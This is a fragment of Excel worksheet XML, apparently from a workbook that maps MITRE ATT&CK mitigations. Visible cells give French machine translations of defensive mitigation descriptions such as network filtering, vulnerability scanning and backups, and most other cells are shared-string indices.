      <c r="D619" s="2" t="s">
        <v>2647</v>
      </c>
    </row>
    <row r="620" spans="1:4" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A620" t="s">
        <v>1853</v>
      </c>
      <c r="B620" s="2" t="s">
        <v>567</v>
      </c>
      <c r="C620" s="2" t="s">
        <v>1854</v>
      </c>
      <c r="D620" s="2" t="s">
        <v>2263</v>
      </c>
    </row>
    <row r="621" spans="1:4" ht="259.2" x14ac:dyDescent="0.3">
      <c r="A621" t="s">
        <v>1855</v>
      </c>
      <c r="B621" s="2" t="s">
        <v>1856</v>
      </c>
      <c r="C621" s="2" t="s">
        <v>1857</v>
      </c>
      <c r="D621" s="2" t="s">
        <v>2648</v>
      </c>
    </row>
    <row r="622" spans="1:4" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A622" t="s">
        <v>1858</v>
      </c>
      <c r="B622" s="2" t="s">
        <v>1859</v>
      </c>
      <c r="C622" s="2" t="s">
        <v>1860</v>
      </c>
      <c r="D622" s="2" t="s">
        <v>2649</v>
      </c>
    </row>
    <row r="623" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A623" t="s">
        <v>1861</v>
      </c>
      <c r="B623" s="2" t="s">
        <v>1862</v>
      </c>
      <c r="C623" s="2" t="s">
        <v>1863</v>
      </c>
      <c r="D623" s="2" t="s">
        <v>2650</v>
      </c>
    </row>
    <row r="624" spans="1:4" ht="216" x14ac:dyDescent="0.3">
      <c r="A624" t="s">
        <v>1864</v>
      </c>
      <c r="B624" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C624" s="2" t="s">
        <v>1866</v>
      </c>
      <c r="D624" s="2" t="s">
        <v>1865</v>
      </c>
    </row>
    <row r="625" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A625" t="s">
        <v>1867</v>
      </c>
      <c r="B625" s="2" t="s">
        <v>1868</v>
      </c>
      <c r="C625" s="2" t="s">
        <v>1869</v>
      </c>
      <c r="D625" s="2" t="s">
        <v>1868</v>
      </c>
    </row>
    <row r="626" spans="1:4" ht="201.6" x14ac:dyDescent="0.3">
      <c r="A626" t="s">
        <v>1870</v>
      </c>
      <c r="B626" s="2" t="s">
        <v>1871</v>
      </c>
      <c r="C626" s="2" t="s">
        <v>1872</v>
      </c>
      <c r="D626" s="2" t="s">
        <v>2651</v>
      </c>
    </row>
    <row r="627" spans="1:4" ht="216" x14ac:dyDescent="0.3">
      <c r="A627" t="s">
        <v>1873</v>
      </c>
      <c r="B627" s="2" t="s">
        <v>1874</v>
      </c>
      <c r="C627" s="2" t="s">
        <v>1875</v>
      </c>
      <c r="D627" s="2" t="s">
        <v>2652</v>
      </c>
    </row>
    <row r="628" spans="1:4" ht="201.6" x14ac:dyDescent="0.3">
      <c r="A628" t="s">
        <v>1876</v>
      </c>
      <c r="B628" s="2" t="s">
        <v>1877</v>
      </c>
      <c r="C628" s="2" t="s">
        <v>1878</v>
      </c>
      <c r="D628" s="2" t="s">
        <v>2653</v>
      </c>
    </row>
    <row r="629" spans="1:4" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A629" t="s">
        <v>1879</v>
      </c>
      <c r="B629" s="2" t="s">
        <v>1434</v>
      </c>
      <c r="C629" s="2" t="s">
        <v>1880</v>
      </c>
      <c r="D629" s="2" t="s">
        <v>1434</v>
      </c>
    </row>
    <row r="630" spans="1:4" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A630" t="s">
        <v>1881</v>
      </c>
      <c r="B630" s="2" t="s">
        <v>1882</v>
      </c>
      <c r="C630" s="2" t="s">
        <v>1883</v>
      </c>
      <c r="D630" s="2" t="s">
        <v>2654</v>
      </c>
    </row>
    <row r="631" spans="1:4" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A631" t="s">
        <v>1884</v>
      </c>
      <c r="B631" s="2" t="s">
        <v>1885</v>
      </c>
      <c r="C631" s="2" t="s">
        <v>1886</v>
      </c>
      <c r="D631" s="2" t="s">
        <v>2655</v>
      </c>
    </row>
    <row r="632" spans="1:4" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A632" t="s">
        <v>1887</v>
      </c>
      <c r="B632" s="2" t="s">
        <v>1888</v>
      </c>
      <c r="C632" s="2" t="s">
        <v>1889</v>
      </c>
      <c r="D632" s="2" t="s">
        <v>2656</v>
      </c>
    </row>
    <row r="633" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A633" t="s">
        <v>1890</v>
      </c>
      <c r="B633" s="2" t="s">
        <v>1891</v>
      </c>
      <c r="C633" s="2" t="s">
        <v>1892</v>
      </c>
      <c r="D633" s="2" t="s">
        <v>2657</v>
      </c>
    </row>
    <row r="634" spans="1:4" ht="288" x14ac:dyDescent="0.3">
      <c r="A634" t="s">
        <v>1893</v>
      </c>
      <c r="B634" s="2" t="s">
        <v>1894</v>
      </c>
      <c r="C634" s="2" t="s">
        <v>1895</v>
      </c>
      <c r="D634" s="2" t="s">
        <v>2658</v>
      </c>
    </row>
    <row r="635" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A635" t="s">
        <v>1896</v>
      </c>
      <c r="B635" s="2" t="s">
        <v>1897</v>
      </c>
      <c r="C635" s="2" t="s">
        <v>1898</v>
      </c>
      <c r="D635" s="2" t="s">
        <v>2659</v>
      </c>
    </row>
    <row r="636" spans="1:4" ht="144" x14ac:dyDescent="0.3">
      <c r="A636" t="s">
        <v>1899</v>
      </c>
      <c r="B636" s="2" t="s">
        <v>1900</v>
      </c>
      <c r="C636" s="2" t="s">
        <v>1901</v>
      </c>
      <c r="D636" s="2" t="s">
        <v>1900</v>
      </c>
    </row>
    <row r="637" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A637" t="s">
        <v>1902</v>
      </c>
      <c r="B637" s="2" t="s">
        <v>1903</v>
      </c>
      <c r="C637" s="2" t="s">
        <v>1904</v>
      </c>
      <c r="D637" s="2" t="s">
        <v>2660</v>
      </c>
    </row>
    <row r="638" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A638" t="s">
        <v>1905</v>
      </c>
      <c r="B638" s="2" t="s">
        <v>1906</v>
      </c>
      <c r="C638" s="2" t="s">
        <v>1907</v>
      </c>
      <c r="D638" s="2" t="s">
        <v>2661</v>
      </c>
    </row>
    <row r="639" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A639" t="s">
        <v>1908</v>
      </c>
      <c r="B639" s="2" t="s">
        <v>1909</v>
      </c>
      <c r="C639" s="2" t="s">
        <v>1910</v>
      </c>
      <c r="D639" s="2" t="s">
        <v>2662</v>
      </c>
    </row>
    <row r="640" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A640" t="s">
        <v>1911</v>
      </c>
      <c r="B640" s="2" t="s">
        <v>1912</v>
      </c>
      <c r="C640" s="2" t="s">
        <v>1913</v>
      </c>
      <c r="D640" s="2" t="s">
        <v>2663</v>
      </c>
    </row>
    <row r="641" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A641" t="s">
        <v>1914</v>
      </c>
      <c r="B641" s="2" t="s">
        <v>1915</v>
      </c>
      <c r="C641" s="2" t="s">
        <v>1916</v>
      </c>
      <c r="D641" s="2" t="s">
        <v>1915</v>
      </c>
    </row>
    <row r="642" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A642" t="s">
        <v>1917</v>
      </c>
      <c r="B642" s="2" t="s">
        <v>1918</v>
      </c>
      <c r="C642" s="2" t="s">
        <v>1919</v>
      </c>
      <c r="D642" s="2" t="s">
        <v>2664</v>
      </c>
    </row>
    <row r="643" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A643" t="s">
        <v>1920</v>
      </c>
      <c r="B643" s="2" t="s">
        <v>597</v>
      </c>
      <c r="C643" s="2" t="s">
        <v>1921</v>
      </c>
      <c r="D643" s="2" t="s">
        <v>2273</v>
      </c>
    </row>
    <row r="644" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A644" t="s">
        <v>1922</v>
      </c>
      <c r="B644" s="2" t="s">
        <v>1923</v>
      </c>
      <c r="C644" s="2" t="s">
        <v>1924</v>
      </c>
      <c r="D644" s="2" t="s">
        <v>2665</v>
      </c>
    </row>
    <row r="645" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A645" t="s">
        <v>1925</v>
      </c>
      <c r="B645" s="2" t="s">
        <v>1926</v>
      </c>
      <c r="C645" s="2" t="s">
        <v>1927</v>
      </c>
      <c r="D645" s="2" t="s">
        <v>2666</v>
      </c>
    </row>
    <row r="646" spans="1:4" ht="144" x14ac:dyDescent="0.3">
      <c r="A646" t="s">
        <v>1928</v>
      </c>
      <c r="B646" s="2" t="s">
        <v>1929</v>
      </c>
      <c r="C646" s="2" t="s">
        <v>1930</v>
      </c>
      <c r="D646" s="2" t="s">
        <v>2667</v>
      </c>
    </row>
    <row r="647" spans="1:4" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A647" t="s">
        <v>1931</v>
      </c>
      <c r="B647" s="2" t="s">
        <v>1932</v>
      </c>
      <c r="C647" s="2" t="s">
        <v>1933</v>
      </c>
      <c r="D647" s="2" t="s">
        <v>2668</v>
      </c>
    </row>
    <row r="648" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A648" t="s">
        <v>1934</v>
      </c>
      <c r="B648" s="2" t="s">
        <v>1935</v>
      </c>
      <c r="C648" s="2" t="s">
        <v>1936</v>
      </c>
      <c r="D648" s="2" t="s">
        <v>2669</v>
      </c>
    </row>
    <row r="649" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A649" t="s">
        <v>1937</v>
      </c>
      <c r="B649" s="2" t="s">
        <v>1938</v>
      </c>
      <c r="C649" s="2" t="s">
        <v>1939</v>
      </c>
      <c r="D649" s="2" t="s">
        <v>2670</v>
      </c>
    </row>
    <row r="650" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A650" t="s">
        <v>1940</v>
      </c>
      <c r="B650" s="2" t="s">
        <v>1941</v>
      </c>
      <c r="C650" s="2" t="s">
        <v>1942</v>
      </c>
      <c r="D650" s="2" t="s">
        <v>2671</v>
      </c>
    </row>
    <row r="651" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A651" t="s">
        <v>1943</v>
      </c>
      <c r="B651" s="2" t="s">
        <v>1944</v>
      </c>
      <c r="C651" s="2" t="s">
        <v>1945</v>
      </c>
      <c r="D651" s="2" t="s">
        <v>2672</v>
      </c>
    </row>
    <row r="652" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A652" t="s">
        <v>1946</v>
      </c>
      <c r="B652" s="2" t="s">
        <v>1947</v>
      </c>
      <c r="C652" s="2" t="s">
        <v>1948</v>
      </c>
      <c r="D652" s="2" t="s">
        <v>2673</v>
      </c>
    </row>
    <row r="653" spans="1:4" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A653" t="s">
        <v>1949</v>
      </c>
      <c r="B653" s="2" t="s">
        <v>1950</v>
      </c>
      <c r="C653" s="2" t="s">
        <v>1951</v>
      </c>
      <c r="D653" s="2" t="s">
        <v>2674</v>
      </c>
    </row>
    <row r="654" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A654" t="s">
        <v>1952</v>
      </c>
      <c r="B654" s="2" t="s">
        <v>1953</v>
      </c>
      <c r="C654" s="2" t="s">
        <v>1954</v>
      </c>
      <c r="D654" s="2" t="s">
        <v>2675</v>
      </c>
    </row>
    <row r="655" spans="1:4" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A655" t="s">
        <v>1955</v>
      </c>
      <c r="B655" s="2" t="s">
        <v>1956</v>
      </c>
      <c r="C655" s="2" t="s">
        <v>1957</v>
      </c>
      <c r="D655" s="2" t="s">
        <v>1956</v>
      </c>
    </row>
    <row r="656" spans="1:4" ht="158.4" x14ac:dyDescent="0.3">
      <c r="A656" t="s">
        <v>1958</v>
      </c>
      <c r="B656" s="2" t="s">
        <v>1959</v>
      </c>
      <c r="C656" s="2" t="s">
        <v>1960</v>
      </c>
      <c r="D656" s="2" t="s">
        <v>2676</v>
      </c>
    </row>
    <row r="657" spans="1:5" ht="158.4" x14ac:dyDescent="0.3">
      <c r="A657" t="s">
        <v>1961</v>
      </c>
      <c r="B657" s="2" t="s">
        <v>1962</v>
      </c>
      <c r="C657" s="2" t="s">
        <v>1963</v>
      </c>
      <c r="D657" s="2" t="s">
        <v>1962</v>
      </c>
    </row>
    <row r="658" spans="1:5" x14ac:dyDescent="0.3">
      <c r="E658" s="2" t="s">
        <v>3221</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <ignoredErrors>
    <ignoredError sqref="D2:D3 D5:D657 E2 E3:E105 E107:E121 E123:E205 E206:E297 E299:E305 E306:E373 E375 E377:E405 E406:E462 E464:E505" calculatedColumn="1"/>
  </ignoredErrors>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2"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B4" sqref="B4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.88671875" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="2" max="2" width="35" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A1" t="s">
        <v>0</v>
      </c>
      <c r="B1" t="s">
        <v>1964</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>19</v>
      </c>
      <c r="B2" t="s">
        <v>1965</v>
      </c>
    </row>
  </sheetData>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45"/>
  <sheetViews>
    <sheetView topLeftCell="E1" zoomScale="70" zoomScaleNormal="70" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A25" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="G1" sqref="G1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.88671875" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="10.6640625" customWidth="1"/>
    <col min="2" max="2" width="36.21875" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="16.44140625" customWidth="1"/>
    <col min="4" max="4" width="13.21875" customWidth="1"/>
    <col min="5" max="5" width="185.6640625" style="2" customWidth="1"/>
    <col min="6" max="6" width="36.21875" style="2" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="185.6640625" style="2" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="15.6" x14ac:dyDescent="0.3">
      <c r="A1" s="1" t="s">
        <v>7</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>1966</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>1967</v>
      </c>
      <c r="E1" s="3" t="s">
        <v>11</v>
      </c>
      <c r="F1" s="3" t="s">
        <v>2103</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>2104</v>
      </c>
    </row>
    <row r="2" spans="1:7" ht="31.2" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>1968</v>
      </c>
      <c r="B2" t="s">
        <v>1969</v>
      </c>
      <c r="C2" t="s">
        <v>1970</v>
      </c>
      <c r="D2" t="s">
        <v>1971</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>1972</v>
      </c>
      <c r="F2" s="5" t="s">
        <v>2678</v>
      </c>
      <c r="G2" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez des signatures de détection d’intrusion pour bloquer le trafic aux limites du réseau.
https://attack.mitre.org/mitigations/M1031</v>
      </c>
    </row>
    <row r="3" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A3" t="s">
        <v>1973</v>
      </c>
      <c r="B3" t="s">
        <v>744</v>
      </c>
      <c r="C3" t="s">
        <v>1970</v>
      </c>
      <c r="D3" t="s">
        <v>1971</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>1974</v>
      </c>
      <c r="F3" s="2" t="s">
        <v>2319</v>
      </c>
      <c r="G3" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>L’analyse des vulnérabilités est utilisée pour trouver des vulnérabilités logicielles potentiellement exploitables afin d’y remédier.
https://attack.mitre.org/mitigations/M1016</v>
      </c>
    </row>
    <row r="4" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A4" t="s">
        <v>1975</v>
      </c>
      <c r="B4" t="s">
        <v>1976</v>
      </c>
      <c r="C4" t="s">
        <v>1977</v>
      </c>
      <c r="D4" t="s">
        <v>1971</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>1978</v>
      </c>
      <c r="F4" s="2" t="s">
        <v>2679</v>
      </c>
      <c r="G4" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêchez l’accès aux partages de fichiers, l’accès à distance aux systèmes, les services inutiles. Les mécanismes de limitation de l’accès peuvent inclure l’utilisation de concentrateurs de réseau, de passerelles RDP, etc.
https://attack.mitre.org/mitigations/M1035</v>
      </c>
    </row>
    <row r="5" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A5" t="s">
        <v>1979</v>
      </c>
      <c r="B5" t="s">
        <v>1980</v>
      </c>
      <c r="C5" t="s">
        <v>1977</v>
      </c>
      <c r="D5" t="s">
        <v>1971</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>1981</v>
      </c>
      <c r="F5" s="2" t="s">
        <v>2680</v>
      </c>
      <c r="G5" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez le stockage à distance des journaux de sécurité et des fichiers sensibles dont l’accès peut être mieux contrôlé afin d’éviter l’exposition des données du journal de détection d’intrusion ou des informations sensibles.
https://attack.mitre.org/mitigations/M1029</v>
      </c>
    </row>
    <row r="6" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A6" t="s">
        <v>1982</v>
      </c>
      <c r="B6" t="s">
        <v>1983</v>
      </c>
      <c r="C6" t="s">
        <v>1977</v>
      </c>
      <c r="D6" t="s">
        <v>1971</v>
      </c>
      <c r="E6" s="2" t="s">
        <v>1984</v>
      </c>
      <c r="F6" s="2" t="s">
        <v>2681</v>
      </c>
      <c r="G6" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez des appliances réseau pour filtrer le trafic entrant ou sortant et effectuer un filtrage basé sur le protocole. Configurez le logiciel sur les points de terminaison pour filtrer le trafic réseau.
https://attack.mitre.org/mitigations/M1037</v>
      </c>
    </row>
    <row r="7" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A7" t="s">
        <v>1985</v>
      </c>
      <c r="B7" t="s">
        <v>1986</v>
      </c>
      <c r="C7" t="s">
        <v>1977</v>
      </c>
      <c r="D7" t="s">
        <v>1971</v>
      </c>
      <c r="E7" s="2" t="s">
        <v>1987</v>
      </c>
      <c r="F7" s="2" t="s">
        <v>2682</v>
      </c>
      <c r="G7" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Restreindre l’utilisation de certains sites Web, bloquer les téléchargements/pièces jointes, bloquer Javascript, restreindre les extensions de navigateur, etc.
https://attack.mitre.org/mitigations/M1021</v>
      </c>
    </row>
    <row r="8" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A8" t="s">
        <v>1988</v>
      </c>
      <c r="B8" t="s">
        <v>1989</v>
      </c>
      <c r="C8" t="s">
        <v>1977</v>
      </c>
      <c r="D8" t="s">
        <v>1971</v>
      </c>
      <c r="E8" s="2" t="s">
        <v>1990</v>
      </c>
      <c r="F8" s="2" t="s">
        <v>2683</v>
      </c>
      <c r="G8" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêcher les utilisateurs ou les groupes d’installer des logiciels non approuvés.
https://attack.mitre.org/mitigations/M1033</v>
      </c>
    </row>
    <row r="9" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9" t="s">
        <v>1991</v>
      </c>
      <c r="B9" t="s">
        <v>1992</v>
      </c>
      <c r="C9" t="s">
        <v>1993</v>
      </c>
      <c r="D9" t="s">
        <v>1971</v>
      </c>
      <c r="E9" s="2" t="s">
        <v>1994</v>
      </c>
      <c r="F9" s="2" t="s">
        <v>2684</v>
      </c>
      <c r="G9" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Cette atténuation décrit toutes les orientations ou formations données aux développeurs d’applications pour éviter d’introduire des faiblesses de sécurité dont un adversaire peut tirer parti.
https://attack.mitre.org/mitigations/M1013</v>
      </c>
    </row>
    <row r="10" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A10" t="s">
        <v>1995</v>
      </c>
      <c r="B10" t="s">
        <v>1996</v>
      </c>
      <c r="C10" t="s">
        <v>1977</v>
      </c>
      <c r="D10" t="s">
        <v>1971</v>
      </c>
      <c r="E10" s="2" t="s">
        <v>1997</v>
      </c>
      <c r="F10" s="2" t="s">
        <v>2685</v>
      </c>
      <c r="G10" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêcher des utilisateurs ou des groupes d’installer ou d’utiliser du matériel non approuvé sur des systèmes, y compris des périphériques USB.
https://attack.mitre.org/mitigations/M1034</v>
      </c>
    </row>
    <row r="11" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A11" t="s">
        <v>1998</v>
      </c>
      <c r="B11" t="s">
        <v>1999</v>
      </c>
      <c r="C11" t="s">
        <v>1993</v>
      </c>
      <c r="D11" t="s">
        <v>1971</v>
      </c>
      <c r="E11" s="2" t="s">
        <v>2000</v>
      </c>
      <c r="F11" s="2" t="s">
        <v>2686</v>
      </c>
      <c r="G11" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Former les utilisateurs à être conscients des tentatives d’accès ou de manipulation par un adversaire afin de réduire le risque de spearphishing, d’ingénierie sociale et d’autres techniques impliquant une interaction avec l’utilisateur.
https://attack.mitre.org/mitigations/M1017</v>
      </c>
    </row>
    <row r="12" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A12" t="s">
        <v>2001</v>
      </c>
      <c r="B12" t="s">
        <v>2002</v>
      </c>
      <c r="C12" t="s">
        <v>1977</v>
      </c>
      <c r="D12" t="s">
        <v>1971</v>
      </c>
      <c r="E12" s="2" t="s">
        <v>2003</v>
      </c>
      <c r="F12" s="2" t="s">
        <v>2687</v>
      </c>
      <c r="G12" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Configurez le contrôle de compte d’utilisateur Windows pour réduire le risque que des adversaires obtiennent un accès élevé aux processus.
https://attack.mitre.org/mitigations/M1052</v>
      </c>
    </row>
    <row r="13" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A13" t="s">
        <v>2004</v>
      </c>
      <c r="B13" t="s">
        <v>2005</v>
      </c>
      <c r="C13" t="s">
        <v>1977</v>
      </c>
      <c r="D13" t="s">
        <v>1971</v>
      </c>
      <c r="E13" s="2" t="s">
        <v>2006</v>
      </c>
      <c r="F13" s="2" t="s">
        <v>2688</v>
      </c>
      <c r="G13" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Apportez des modifications de configuration liées au système d’exploitation ou à une caractéristique commune du système d’exploitation qui entraînent un renforcement du système par rapport aux techniques.
https://attack.mitre.org/mitigations/M1028</v>
      </c>
    </row>
    <row r="14" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A14" t="s">
        <v>2007</v>
      </c>
      <c r="B14" t="s">
        <v>2008</v>
      </c>
      <c r="C14" t="s">
        <v>2009</v>
      </c>
      <c r="D14" t="s">
        <v>1971</v>
      </c>
      <c r="E14" s="2" t="s">
        <v>2010</v>
      </c>
      <c r="F14" s="2" t="s">
        <v>2689</v>
      </c>
      <c r="G14" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Effectuez et stockez des sauvegardes de données à partir des systèmes de l’utilisateur final et des serveurs critiques. Assurez-vous que les systèmes de sauvegarde et de stockage sont renforcés et séparés du réseau de l’entreprise afin d’éviter toute compromission.
https://attack.mitre.org/mitigations/M1053</v>
      </c>
    </row>
    <row r="15" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A15" t="s">
        <v>2011</v>
      </c>
      <c r="B15" t="s">
        <v>2012</v>
      </c>
      <c r="C15" t="s">
        <v>1977</v>
      </c>
      <c r="D15" t="s">
        <v>1971</v>
      </c>
      <c r="E15" s="2" t="s">
        <v>2013</v>
      </c>
      <c r="F15" s="2" t="s">
        <v>2690</v>
      </c>
      <c r="G15" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Bloquer l’exécution de code sur un système par le biais du contrôle d’application et/ou du blocage de script.
https://attack.mitre.org/mitigations/M1038</v>
      </c>
    </row>
    <row r="16" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A16" t="s">
        <v>2014</v>
      </c>
      <c r="B16" t="s">
        <v>2015</v>
      </c>
      <c r="C16" t="s">
        <v>1977</v>
      </c>
      <c r="D16" t="s">
        <v>1971</v>
      </c>
      <c r="E16" s="2" t="s">
        <v>2016</v>
      </c>
      <c r="F16" s="2" t="s">
        <v>2691</v>
      </c>
      <c r="G16" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utiliser des fonctionnalités pour empêcher l’accès réussi aux informations d’identification par des adversaires ; y compris le blocage des formes de dumping d’informations d’identification.
https://attack.mitre.org/mitigations/M1043</v>
      </c>
    </row>
    <row r="17" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17" t="s">
        <v>2017</v>
      </c>
      <c r="B17" t="s">
        <v>444</v>
      </c>
      <c r="C17" t="s">
        <v>1977</v>
      </c>
      <c r="D17" t="s">
        <v>1971</v>
      </c>
      <c r="E17" s="2" t="s">
        <v>2018</v>
      </c>
      <c r="F17" s="2" t="s">
        <v>2228</v>
      </c>
      <c r="G17" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Renforcez l’intégrité binaire et de l’application avec la vérification de la signature numérique pour empêcher l’exécution de code non fiable.
https://attack.mitre.org/mitigations/M1045</v>
      </c>
    </row>
    <row r="18" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18" t="s">
        <v>2019</v>
      </c>
      <c r="B18" t="s">
        <v>2020</v>
      </c>
      <c r="C18" t="s">
        <v>1977</v>
      </c>
      <c r="D18" t="s">
        <v>1971</v>
      </c>
      <c r="E18" s="2" t="s">
        <v>2021</v>
      </c>
      <c r="F18" s="2" t="s">
        <v>2692</v>
      </c>
      <c r="G18" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêchez la modification des variables d’environnement par des utilisateurs et des groupes non autorisés.
https://attack.mitre.org/mitigations/M1039</v>
      </c>
    </row>
    <row r="19" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A19" t="s">
        <v>2022</v>
      </c>
      <c r="B19" t="s">
        <v>2023</v>
      </c>
      <c r="C19" t="s">
        <v>1970</v>
      </c>
      <c r="D19" t="s">
        <v>1971</v>
      </c>
      <c r="E19" s="2" t="s">
        <v>2024</v>
      </c>
      <c r="F19" s="2" t="s">
        <v>2693</v>
      </c>
      <c r="G19" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez une stratégie de prévention des pertes de données (DLP) pour catégoriser les données sensibles, identifier les formats de données indiquant des informations personnelles identifiables (PII) et limiter l’exfiltration de données sensibles. (Citation : Prévention des pertes de données PurpleSec)
https://attack.mitre.org/mitigations/M1057</v>
      </c>
    </row>
    <row r="20" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A20" t="s">
        <v>2025</v>
      </c>
      <c r="B20" t="s">
        <v>2026</v>
      </c>
      <c r="C20" t="s">
        <v>1977</v>
      </c>
      <c r="D20" t="s">
        <v>1971</v>
      </c>
      <c r="E20" s="2" t="s">
        <v>2027</v>
      </c>
      <c r="F20" s="2" t="s">
        <v>2694</v>
      </c>
      <c r="G20" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Protégez les processus avec des privilèges élevés qui peuvent être utilisés pour interagir avec des composants système critiques à l’aide d’un éclairage de processus protégé, de défenses anti-injection de processus ou d’autres mesures d’application de l’intégrité des processus.
https://attack.mitre.org/mitigations/M1025</v>
      </c>
    </row>
    <row r="21" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A21" t="s">
        <v>2028</v>
      </c>
      <c r="B21" t="s">
        <v>2029</v>
      </c>
      <c r="C21" t="s">
